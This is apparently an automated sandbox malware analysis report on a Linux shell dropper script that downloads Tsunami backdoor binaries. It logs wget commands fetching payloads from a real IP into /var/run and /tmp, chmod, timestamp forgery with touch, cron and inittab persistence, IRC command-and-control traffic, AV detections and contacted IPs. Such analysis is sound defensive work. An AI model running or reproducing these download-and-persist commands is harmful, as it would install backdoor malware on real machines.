Source: /usr/sbin/service (PID: 7893)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 7897)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 7939)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 7974)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 7983)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 8012)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 8042)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 8072)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 8093)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 8120)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 8162)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 8174)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 8198)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 8246)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Source: /bin/sh (PID: 5108)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /tmp/pty
Source: /bin/sh (PID: 5322)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /tmp/irq0
Source: /bin/sh (PID: 5514)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 6098)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /tmp/irq1
Source: /bin/sh (PID: 6303)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 4585)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
Source: /bin/sh (PID: 4606)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
Source: /bin/sh (PID: 4638)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
Source: /bin/sh (PID: 4670)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
Source: /bin/sh (PID: 4702)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
Source: /bin/sh (PID: 4734)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
Source: /bin/sh (PID: 4766)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
Source: /bin/sh (PID: 4798)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O pty
Source: /bin/sh (PID: 4830)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq0 -O irq0
Source: /bin/sh (PID: 5283)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq1 -O irq1
Source: /bin/sh (PID: 5979)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq2 -O irq2
Source: /bin/sh (PID: 6393)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/tmp/pty
Source: /bin/sh (PID: 6713)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/run/pty
Source: /bin/chmod (PID: 4603)File: /var/run/tty0 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4604)File: /var/run/tty0 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4635)File: /var/run/tty1 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4636)File: /var/run/tty1 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4667)File: /var/run/tty2 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4668)File: /var/run/tty2 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4699)File: /var/run/tty3 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4700)File: /var/run/tty3 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4731)File: /var/run/tty4 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4732)File: /var/run/tty4 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4763)File: /var/run/tty5 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4764)File: /var/run/tty5 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4795)File: /var/run/tty6 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4796)File: /var/run/tty6 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4827)File: ./pty (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 4828)File: ./pty (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 5093)File: /tmp/pty (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 5280)File: ./irq0 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /bin/chmod (PID: 5281)File: ./irq0 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 5319)File: /tmp/irq0 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /bin/chmod (PID: 5974)File: ./irq1 (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5977)File: ./irq1 (bits: - usr: - grp: - all: rwx)
Source: /bin/chmod (PID: 6078)File: /tmp/irq1 (bits: - usr: - grp: - all: rwx)
Source: /bin/chmod (PID: 6382)File: ./irq2 (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 6385)File: ./irq2 (bits: - usr: - grp: - all: rwx)
Source: /bin/chmod (PID: 6699)File: /var/tmp/pty (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 6705)File: /var/tmp/pty (bits: - usr: - grp: - all: rwx)
Source: /bin/chmod (PID: 7019)File: /var/run/pty (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 7024)File: /var/run/pty (bits: - usr: - grp: - all: rwx)
Source: /usr/bin/wget (PID: 4585)File written: /run/tty0Jump to dropped file
Source: /usr/bin/wget (PID: 4606)File written: /run/tty1Jump to dropped file
Source: /usr/bin/wget (PID: 4638)File written: /run/tty2Jump to dropped file
Source: /usr/bin/wget (PID: 4670)File written: /run/tty3Jump to dropped file
Source: /usr/bin/wget (PID: 4702)File written: /run/tty4Jump to dropped file
Source: /usr/bin/wget (PID: 4734)File written: /run/tty5Jump to dropped file
Source: /usr/bin/wget (PID: 4766)File written: /run/tty6Jump to dropped file
Source: /usr/bin/wget (PID: 4798)File written: /tmp/ptyJump to dropped file
Source: /usr/bin/wget (PID: 4830)File written: /tmp/irq0Jump to dropped file
Source: /usr/bin/wget (PID: 5283)File written: /tmp/irq1Jump to dropped file
Source: /usr/bin/wget (PID: 5979)File written: /tmp/irq2Jump to dropped file
Source: /usr/bin/wget (PID: 6393)File written: /var/tmp/ptyJump to dropped file
Source: /usr/bin/wget (PID: 6713)File written: /run/ptyJump to dropped file
Source: /usr/bin/crontab (PID: 5209)Crontab like entry written: /var/spool/cron/crontabs/tmp.NIHyLbJump to dropped file
Source: /usr/bin/crontab (PID: 5414)Crontab like entry written: /var/spool/cron/crontabs/tmp.eaL8KXJump to dropped file
Source: /usr/bin/crontab (PID: 6170)Crontab like entry written: /var/spool/cron/crontabs/tmp.U4426KJump to dropped file
Source: submitted sampleStderr: --2021-03-25 06:27:06-- http://71.127.148.69/.x/tty0Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 34125 (33K) [text/plain]Saving to: /var/run/tty0 0K .......... .......... .......... ... 100% 89.8K=0.4s2021-03-25 06:27:06 (89.8 KB/s) - /var/run/tty0 saved [34125/34125]/tmp/1.sh: 1: /tmp/1.sh: /var/run/tty0: Permission denied--2021-03-25 06:27:06-- http://71.127.148.69/.x/tty1Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 63780 (62K) [text/plain]Saving to: /var/run/tty1 0K .......... .......... .......... .......... .......... 80% 131K 0s 50K .......... .. 100% 113K=0.5s2021-03-25 06:27:07 (127 KB/s) - /var/run/tty1 saved [63780/63780]/tmp/1.sh: 2: /tmp/1.sh: /var/run/tty1: Permission denied--2021-03-25 06:27:07-- http://71.127.148.69/.x/tty2Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 40580 (40K) [text/plain]Saving to: /var/run/tty2 0K .......... .......... .......... ......... 100% 101K=0.4s2021-03-25 06:27:08 (101 KB/s) - /var/run/tty2 saved [40580/40580]/tmp/1.sh: 3: /tmp/1.sh: /var/run/tty2: Permission denied--2021-03-25 06:27:08-- http://71.127.148.69/.x/tty3Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 41815 (41K) [text/plain]Saving to: /var/run/tty3 0K .......... .......... .......... .......... 100% 109K=0.4s2021-03-25 06:27:09 (109 KB/s) - /var/run/tty3 saved [41815/41815]/tmp/1.sh: 4: /tmp/1.sh: /var/run/tty3: Permission denied--2021-03-25 06:27:09-- http://71.127.148.69/.x/tty4Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 38220 (37K) [text/plain]Saving to: /var/run/tty4 0K .......... .......... .......... ....... 100% 99.1K=0.4s2021-03-25 06:27:09 (99.1 KB/s) - /var/run/tty4 saved [38220/38220]/tmp/1.sh: 5: /tmp/1.sh: /var/run/tty4: Permission denied--2021-03-25 06:27:09-- http://71.127.148.69/.x/tty5Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 36716 (36K) [text/plain]Saving to: /var/run/tty5 0K .......... .......... .......... ..... 100% 94.8K=0.4s2021-03-25 06:27:10 (94.8 KB/s) - /var/run/tty5 saved [36716/36716]/tmp/1.sh: 6: /tmp/1.sh: /var/run/tty5: Permission denied--2021-03-25 06:27:10-- http://71.127.148.69/.x/tty6Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 43197 (42K) [text/plain]Saving to: /var/run/tty6 0K .......... .......... .......... .......... .. 100% 116K=0.4s2021-03-25 06:27:10 (116 KB/s) - /var/run/tty6 saved [43197/43197]--2021-03-25 06:27:10-- http://71.127.148.69/.x/pty/tmp/1.sh: 7: /tmp/1.sh: /var/run/tty6: Permission deniedConnecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 44700 (44K) [text/plain]Saving to: pty 0K .......... .......... .......... .......... ... 100% 116K=0.4s2021-03-25 06:27:11 (116 KB/s) - pty saved [44700/44700]--2021-03-25 06:27:11-- http://71.127.148.69/.x/irq0Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 619271 (605K) [text/plain]Saving to: irq0 0K .......... .......... .......... .......... .......... 8% 139K 4s 50K .......... .......... .......... .......... .......... 16% 212K 3s 100K .......... .......... .......... .......... .......... 24% 213K 3s 150K .......... .......... .......... .......... .......... 33% 379K 2s 200K .......... .......... .......... .......... .......... 41% 222K 2s 250K .......... .......... .......... .......... .......... 49% 365K 1s 300K .......... .......... .......... .......... .......... 57% 218K 1s 350K .......... .......... .......... .......... .......... 66% 335K 1s 400K .......... .......... .......... .......... .......... 74% 236K 1s 450K .......... .......... .......... .......... .......... 82% 224K 0s 500K .......... .......... .......... .......... .......... 90% 320K 0s 550K .......... .......... .......... .......... .......... 99% 227K 0s 600K .... 100% 791K=2.5s2021-03-25 06:27:14 (240 KB/s) - irq0 saved [619271/619271]--2021-03-25 06:27:14-- http://71.127.148.69/.x/irq1Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 522420 (510K) [text/plain]Saving to: irq1 0K ...cat: /etc/inittab: No such file or directory....... .......... .......... .......... .......... 9% 130K 4s 50K .......... .......... .......... .......... .......... 19% 204K 3s 100K .......... .......... .......... .......... .......... 29% 206K 2s 150K .......... .......... .......... .......... .......... 39% 365K 2s 200K .......... .......... .......... ..........Unsupported setsockopt level=1 optname=13 .......... 49% 202K 1s 250K .......... .......... .......... .......... .......... 58% 389K 1s 300K .......... .......... .......... .cat: /var/run/httpd.pid: No such file or directory.cat: /var/run/thttpd.pid........ .......... 68% 205K 1s 350K ..........: No such file or directory .......... .......... .......... .......... 78% 210K 1s 400K .......... .......... .......... .......... .......... 88% 291K 0s 450K .......... .......... .......... .......... .......... 98% 244K 0s 500K .......... 100% 236K=2.3s2021-03-25 06:27:16 (223 KB/s) - irq1 saved [522420/522420]--2021-03-25 06:27:17-- http://71.127.148.69/.x/irq2Connecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 526649 (514K) [text/plain]Saving to: irq2 0K .......... .......... .......... .......... .......... 9% 140K 3s 50K .......... .......... .......... .......... .......... 19% 209K 2s 100K .......... .......... .......... .......... .......... 29% 218K 2s 150K .......... .......... .......... .......... .......... 38% 384K 2s 200K .......... .......... .......... .......... .......... 48% 219K 1s 250K .......... .......... .......... .......... .......... 58% 295K 1s 300K .......... .......... .......... .......... .......... 68% 255K 1s 350K .......... .......... .......... .......... .......... 77% 223K 1s 400K .......... .......... .......... .......... .......... 87% 369K 0s 450K .......... .......... .......... .......... .......... 97% 224K 0s 500K .......... .... 100% 558K=2.2s2021-03-25 06:27:19 (238 KB/s) - irq2 saved [526649/526649]--2021-03-25 06:27:19-- http://71.127.148.69/.x/ptyConnecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 44700 (44K) [text/plain]Saving to: /var/tmp/pty 0K .......... .......... .......Unsupported setsockopt level=65535 optname=128... .......... ... 100% 111K=0.4s2021-03-25 06:27:20 (111 KB/s) - /var/tmp/pty saved [44700/44700]--2021-03-25 06:27:20-- http://71.127.148.69/.x/ptyConnecting to 71.127.148.69:80... connected.HTTP request sent; awaiting response... 200 OKLength: 44700 (44K) [text/plain]Saving to: /var/run/pty 0K .......... .......... .......... .......... ... 100% 120K=0.4s2021-03-25 06:27:20 (120 KB/s) - /var/run/pty saved [44700/44700]/tmp/1.sh: 17: /tmp/1.sh: /var/run/pty: Permission deniedcat: /var/run/httpd.pid: No such file or directorycat: /var/run/thttpd.pid: No such file or directory: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: IRC traffic on port 40072 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 40072 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 34162 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 34162 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 40072 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 43638 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 43638 -> 8080
Source: /bin/uname (PID: 5243)Queries kernel information via 'uname':
Source: /bin/uname (PID: 5268)Queries kernel information via 'uname':
Source: ./irq0 (PID: 5282)Queries kernel information via 'uname':
Source: /bin/uname (PID: 5549)Queries kernel information via 'uname':
Source: /bin/uname (PID: 5552)Queries kernel information via 'uname':
Source: /bin/uname (PID: 5591)Queries kernel information via 'uname':
Source: ./irq1 (PID: 5978)Queries kernel information via 'uname':
Source: /bin/uname (PID: 6320)Queries kernel information via 'uname':
Source: /bin/uname (PID: 6341)Queries kernel information via 'uname':
Source: /bin/uname (PID: 6347)Queries kernel information via 'uname':
Source: ./irq1 (PID: 9181)Queries kernel information via 'uname':
Source: ./irq2 (PID: 6392)Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 8942)Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 8966)Queries kernel information via 'uname':

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Systemd Service1Systemd Service1File and Directory Permissions Modification2OS Credential Dumping1Security Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/Job11Scheduled Task/Job11Scheduled Task/Job11Scripting1LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting1At (Linux)2At (Linux)2Timestomp1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Linux)2Logon Script (Mac)Logon Script (Mac)Indicator Removal on Host1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 375606 Sample: 1.sh Startdate: 25/03/2021 Architecture: LINUX Score: 100 159 162.82.127.84 WBH-ISC-ROUS United States 2->159 161 190.44.10.127 VTRBANDAANCHASACL Chile 2->161 163 98 other IPs or domains 2->163 165 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->165 167 Malicious sample detected (through community Yara rule) 2->167 169 Multi AV Scanner detection for submitted file 2->169 171 3 other signatures 2->171 12 sh 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 2 other processes 2->18 signatures3 process4 process5 20 sh irq0 12->20         started        23 sh irq1 12->23         started        26 sh pty 12->26         started        36 50 other processes 12->36 28 sh date 14->28         started        30 sh apport-checkreports 14->30         started        32 sh date 16->32         started        34 sh apport-gtk 16->34         started        38 2 other processes 18->38 file6 175 Sample tries to persist itself using System V runlevels 20->175 40 irq0 20->40         started        42 irq0 sh 20->42         started        44 irq0 sh 20->44         started        54 9 other processes 20->54 137 /etc/rc.local, ASCII 23->137 dropped 46 irq1 23->46         started        48 irq1 sh 23->48         started        56 10 other processes 23->56 50 pty 26->50         started        139 /var/tmp/pty, ELF 36->139 dropped 141 /tmp/pty, ELF 36->141 dropped 143 /tmp/irq1, ELF 36->143 dropped 145 10 other files (9 malicious) 36->145 dropped 177 Writes identical ELF files to multiple locations 36->177 52 pty 36->52         started        signatures7 process8 file9 59 irq0 40->59         started        69 19 other processes 40->69 61 sh crontab 42->61         started        65 sh 44->65         started        71 20 other processes 46->71 67 sh crontab 48->67         started        73 23 other processes 50->73 75 8 other processes 54->75 147 /run/.x00740882966, ASCII 56->147 dropped 77 9 other processes 56->77 process10 file11 85 370 other processes 59->85 149 /var/spool/cron/crontabs/tmp.eaL8KX, ASCII 61->149 dropped 189 Sample tries to persist itself using cron 61->189 191 Executes the "crontab" command typically for achieving persistence 61->191 87 4 other processes 65->87 151 /var/spool/cron/crontabs/tmp.U4426K, ASCII 67->151 dropped 79 sh service systemctl 69->79         started        81 sh service systemctl 69->81         started        83 sh service systemctl 69->83         started        90 14 other processes 69->90 92 230 other processes 71->92 153 /run/.x001804289383, ASCII 73->153 dropped 94 22 other processes 73->94 155 /etc/inittab, ASCII 77->155 dropped 193 Explicitly modifies time stamps using the "touch" command 77->193 97 4 other processes 77->97 signatures12 process13 file14 105 28 other processes 79->105 107 28 other processes 81->107 109 28 other processes 83->109 99 sh rm 90->99         started        111 2 other processes 90->111 101 sh rm 92->101         started        113 86 other processes 92->113 157 /var/spool/cron/crontabs/tmp.NIHyLb, ASCII 94->157 dropped 181 Sample tries to persist itself using cron 94->181 183 Explicitly modifies time stamps using the "touch" command 94->183 185 Terminates several processes with shell command 'killall' 94->185 103 sh 94->103         started        115 5 other processes 94->115 187 Executes the "crontab" command typically for achieving persistence 97->187 signatures15 process16 signatures17 118 sh killall 99->118         started        123 2 other processes 99->123 125 3 other processes 101->125 121 sh killall 103->121         started        127 4 other processes 103->127 129 2 other processes 105->129 131 2 other processes 107->131 133 2 other processes 109->133 135 6 other processes 113->135 173 Executes the "crontab" command typically for achieving persistence 115->173 process18 signatures19 179 Terminates several processes with shell command 'killall' 121->179

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1.sh17%VirustotalBrowse
1.sh11%MetadefenderBrowse
1.sh24%ReversingLabsScript-Shell.Downloader.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
/var/tmp/pty100%Joe Sandbox ML
/run/pty100%Joe Sandbox ML
/tmp/pty100%Joe Sandbox ML
/run/pty22%MetadefenderBrowse
/run/pty52%ReversingLabsLinux.Backdoor.Tsunami
/run/tty014%MetadefenderBrowse
/run/tty064%ReversingLabsLinux.Backdoor.Tsunami
/run/tty128%MetadefenderBrowse
/run/tty143%ReversingLabsLinux.Backdoor.Tsunami
/run/tty211%MetadefenderBrowse
/run/tty250%ReversingLabsLinux.Backdoor.Tsunami
/run/tty317%MetadefenderBrowse
/run/tty354%ReversingLabsLinux.Backdoor.Tsunami
/run/tty419%MetadefenderBrowse
/run/tty439%ReversingLabsLinux.Backdoor.Tsunami
/run/tty519%MetadefenderBrowse
/run/tty539%ReversingLabsLinux.Backdoor.Tsunami
/run/tty614%MetadefenderBrowse
/run/tty652%ReversingLabsLinux.Backdoor.Tsunami

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://71.127.148.69/.x/pty11%VirustotalBrowse
http://71.127.148.69/.x/pty100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty59%VirustotalBrowse
http://71.127.148.69/.x/tty5100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty612%VirustotalBrowse
http://71.127.148.69/.x/tty6100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty312%VirustotalBrowse
http://71.127.148.69/.x/tty3100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty4100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty1100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty2100%Avira URL Cloudmalware
http://71.127.148.69/.x/irq1100%Avira URL Cloudmalware
http://71.127.148.69/.x/tty0100%Avira URL Cloudmalware
http://71.127.148.69/.x/irq0100%Avira URL Cloudmalware
http://71.127.148.69/.x/irq2100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://71.127.148.69/.x/ptytrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty5true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty6true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty3true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty4true
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty1true
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty2true
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/irq1true
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/tty0true
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/irq0true
  • Avira URL Cloud: malware
unknown
http://71.127.148.69/.x/irq2true
  • Avira URL Cloud: malware
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
162.25.132.78
unknownAustria
197636BAGIS-ASAS1764NextLayerATfalse
162.36.188.139
unknownUnited States
35893ACPCAfalse
162.122.119.224
unknownVenezuela
18722SUPERVALUUSfalse
162.142.18.53
unknownUnited States
394283BEACON-HEALTH-SYSTEMUSfalse
162.124.146.55
unknownUnited States
18722SUPERVALUUSfalse
162.182.161.96
unknownUnited States
21928T-MOBILE-AS21928USfalse
190.175.191.154
unknownArgentina
22927TelefonicadeArgentinaARfalse
162.28.126.115
unknownUnited States
385AFCONC-BLOCK1-ASUSfalse
190.242.247.40
unknownColombia
23520COLUMBUS-NETWORKSUSfalse
190.71.84.126
unknownColombia
13489EPMTelecomunicacionesSAESPCOfalse
162.82.127.84
unknownUnited States
46620WBH-ISC-ROUSfalse
162.38.219.52
unknownFrance
2065FR-RENATER-HDMONReseaumetropolitaindeMontpellierHDMONfalse
162.121.177.242
unknownUnited States
19708UNASSIGNEDfalse
190.188.212.56
unknownArgentina
10481TelecomArgentinaSAARfalse
162.212.212.172
unknownUnited States
15344ASN15344-SLULCfalse
162.123.103.52
unknownUnited States
11857AEGONUSAUSfalse
162.142.13.245
unknownUnited States
394283BEACON-HEALTH-SYSTEMUSfalse
162.53.160.125
unknownCanada
22910LOBLAW-COMPANIESCAfalse
190.47.59.16
unknownChile
22047VTRBANDAANCHASACLfalse
190.242.211.71
unknownColombia
23520COLUMBUS-NETWORKSUSfalse
190.194.247.191
unknownArgentina
10481TelecomArgentinaSAARfalse
162.223.202.126
unknownUnited States
22820CYBERAUSfalse
190.181.106.26
unknownArgentina
52251NORTECHARfalse
190.171.2.203
unknownCosta Rica
11830InstitutoCostarricensedeElectricidadyTelecomCRfalse
162.161.85.251
unknownUnited States
21928T-MOBILE-AS21928USfalse
190.53.135.13
unknownEl Salvador
27773MILLICOMCABLEELSALVADORSADECVSVfalse
190.52.157.194
unknownParaguay
27866COPACOPYfalse
162.142.132.148
unknownSaudi Arabia
25019SAUDINETSTC-ASSAfalse
190.221.115.83
unknownArgentina
11664TechtelLMDSComunicacionesInteractivasSAARfalse
162.162.144.195
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.142.179.168
unknownSaudi Arabia
25019SAUDINETSTC-ASSAfalse
190.235.205.109
unknownPeru
6147TelefonicadelPeruSAAPEfalse
162.245.66.4
unknownUnited States
395033FIBERDROPLLCUSfalse
190.119.172.72
unknownPeru
12252AmericaMovilPeruSACPEfalse
190.178.82.160
unknownArgentina
22927TelefonicadeArgentinaARfalse
190.16.22.117
unknownArgentina
10318TelecomArgentinaSAARfalse
190.159.114.121
unknownColombia
10620TelmexColombiaSACOfalse
190.66.194.229
unknownColombia
3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
162.212.14.100
unknownBarbados
33576DIG001JMfalse
162.197.223.239
unknownUnited States
7018ATT-INTERNET4USfalse
190.106.46.36
unknownArgentina
262230HORUSSISTEMASINFORMATICOSSRLARfalse
190.44.57.7
unknownChile
22047VTRBANDAANCHASACLfalse
162.181.196.175
unknownUnited States
21928T-MOBILE-AS21928USfalse
190.47.230.206
unknownChile
22047VTRBANDAANCHASACLfalse
162.9.249.248
unknownUnited States
35893ACPCAfalse
190.31.47.160
unknownArgentina
7303TelecomArgentinaSAARfalse
162.244.77.52
unknownReserved
32875VIRPUSfalse
162.106.213.7
unknownCanada
395660EDMONTON-CAfalse
162.120.70.135
unknownUnited States
18722SUPERVALUUSfalse
190.4.251.39
unknownChile
7004CTCTransmisionesRegionalesSACLfalse
190.43.96.170
unknownPeru
6147TelefonicadelPeruSAAPEfalse
190.94.29.70
unknownDominican Republic
28118ALTICEDOMINICANASADOfalse
190.9.127.4
unknownColombia
11581TRANSTELSACOfalse
190.131.112.21
unknownEcuador
27738EcuadortelecomSAECfalse
162.176.77.10
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.105.101.117
unknownChina
4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
190.49.175.240
unknownArgentina
22927TelefonicadeArgentinaARfalse
190.7.145.150
unknownColombia
13489EPMTelecomunicacionesSAESPCOfalse
190.117.209.239
unknownPeru
12252AmericaMovilPeruSACPEfalse
162.53.160.166
unknownCanada
22910LOBLAW-COMPANIESCAfalse
190.16.76.0
unknownArgentina
10318TelecomArgentinaSAARfalse
162.92.80.162
unknownUnited States
36091SCAQMD-ASNUSfalse
162.118.188.45
unknownUnited States
54004OPTIMUM-WIFI2USfalse
190.32.232.48
unknownPanama
11556CableWirelessPanamaPAfalse
162.159.108.190
unknownUnited States
13335CLOUDFLARENETUSfalse
162.129.5.158
unknownUnited States
5723JHUUSfalse
190.127.180.94
unknownColombia
26611COMCELSACOfalse
162.153.122.130
unknownUnited States
10796TWC-10796-MIDWESTUSfalse
162.131.92.249
unknownUnited States
6319MARRIOT-ASNUSfalse
190.35.52.78
unknownPanama
11556CableWirelessPanamaPAfalse
190.131.79.197
unknownEcuador
27738EcuadortelecomSAECfalse
162.191.196.206
unknownUnited States
21928T-MOBILE-AS21928USfalse
190.97.160.58
